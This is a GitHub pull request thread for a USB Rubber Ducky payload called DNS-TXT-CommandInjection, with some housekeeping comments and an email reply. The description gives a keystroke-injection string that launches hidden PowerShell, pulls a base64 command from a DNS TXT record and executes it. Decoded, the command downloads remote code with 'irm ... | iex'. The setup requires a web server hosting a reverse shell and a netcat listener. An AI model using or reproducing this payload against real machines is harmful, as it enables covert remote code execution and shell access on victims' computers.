nathansb2022
commented
3 months ago Changed folder and file names due to misspelling injection
Closed nathansb2022 closed 3 months ago
nathansb2022
commented
3 months ago Changed folder and file names due to misspelling injection
JustinKras
commented
3 months ago Unsubscribe
On Sun, Aug 4, 2024, 8:53 AM Nate @.***> wrote:
Changed folder and file names due to misspelling injection
— Reply to this email directly, view it on GitHub https://github.com/hak5/usbrubberducky-payloads/pull/468#issuecomment-2267587832, or unsubscribe https://github.com/notifications/unsubscribe-auth/A6RHLTX6BIU67OVFWT5GH6LZPZE55AVCNFSM6AAAAABL6QP7VSVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDENRXGU4DOOBTGI . You are receiving this because you are subscribed to this thread.Message ID: @.***>
DNS-TXT-CommandInjection - Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
-What my payload intends to do A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have.
-How others can use it Can be used to deliver various amounts of payloads as long as it meets the DNS TXT length limitations. AWS Route53 was used as an example. No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below.
-Any requirements or configuration REQUIRED A domain with the ability to manipulate the DNS TXT records. REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell. REQUIRED A listener for incoming connections like netcat. REQUIRED - Provide URL used for Example DEFINE #MY_TARGET_URL example.com Example: STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"